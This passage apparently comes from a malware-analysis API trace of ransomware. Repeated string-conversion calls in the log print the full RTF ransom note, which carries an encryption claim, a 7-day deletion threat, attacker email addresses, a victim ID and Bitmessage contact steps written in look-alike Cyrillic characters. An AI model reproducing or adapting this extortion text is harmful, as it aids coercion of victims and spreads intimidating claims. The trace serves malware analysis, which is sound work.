software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.516] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.516] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248aaf8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 